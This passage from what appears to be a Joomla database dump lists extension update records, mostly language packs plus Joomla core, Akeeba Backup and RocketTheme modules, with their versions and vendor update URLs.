Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(10132,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(10133,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(10134,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(10135,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(10136,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(10137,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(10138,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(10139,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(10140,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(10141,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(10142,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(10143,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(10144,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(10145,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10146,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(10147,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(10148,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(10149,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(10150,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(10151,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(10152,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(10153,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(10154,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(10155,57,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(10156,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(10157,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(10158,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(10159,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(10160,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(10161,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(10162,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(10163,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(10164,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(10165,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(10166,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(10167,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(10168,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(10169,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(10170,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(10171,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(10172,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(10173,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(10174,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(10175,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(10176,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(10177,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(10178,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(10179,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(10180,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(10181,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(10182,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(10183,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(10184,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(10185,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(10186,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(10187,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(10188,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(10189,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(10190,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(10191,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(10192,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(10193,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(10194,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(10195,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(10196,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(10197,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(10198,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(10199,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(10200,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(10201,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n			https://www.akeebabackup.com/download/fef/1-0-10.html			\n		',''),(10202,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(10203,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-1.html			\n		',''),(10204,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10205,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10206,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10207,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(10208,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10209,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10210,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(10211,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(10212,3,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(10213,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(10214,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(10215,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(10216,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(10217,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(10218,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(10219,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(10220,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(10221,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(10222,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(10223,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(10224,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(10225,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(10226,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(10227,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(10228,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(10229,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(10230,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(10231,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(10232,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(10233,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(10234,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(10235,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(10236,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(10237,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(10238,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(10239,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(10240,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(10241,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(10242,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(10243,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(10244,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(10245,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(10246,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(10247,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(10248,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(10249,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(10250,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(10251,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(10252,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(10253,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(10254,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(10255,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(10256,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(10257,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(10258,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(10259,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(10260,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(10261,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(10262,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(10263,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(10264,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(10265,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(10266,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(10267,57,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(10268,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(10269,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(10270,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(10271,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(10272,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(10273,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(10274,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(10275,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(10276,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(10277,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(10278,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(10279,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(10280,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(10281,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(10282,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(10283,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(10284,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(10285,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(10286,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(10287,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(10288,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(10289,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(10290,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(10291,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(10292,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(10293,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(10294,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(10295,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(10296,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(10297,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(10298,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(10299,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(10300,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(10301,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(10302,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(10303,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(10304,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(10305,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(10306,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(10307,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(10308,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(10309,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(10310,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(10311,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(10312,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(10313,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(10314,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n			https://www.akeebabackup.com/download/fef/1-0-10.html			\n		',''),(10315,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(10316,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-1.html			\n		',''),(10317,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10318,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10319,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(10320,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10321,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10322,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10323,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10324,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/7-0-0.html			\n		',''),(10325,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10326,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10327,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10328,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10329,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10330,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/7-0-0.html			\n		',''),(10331,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10332,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10333,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10334,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/7-0-0.html			\n		',''),(10335,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10336,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(10337,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(10338,3,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(10339,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(10340,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(10341,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(10342,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(10343,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(10344,3,0,'Arabic 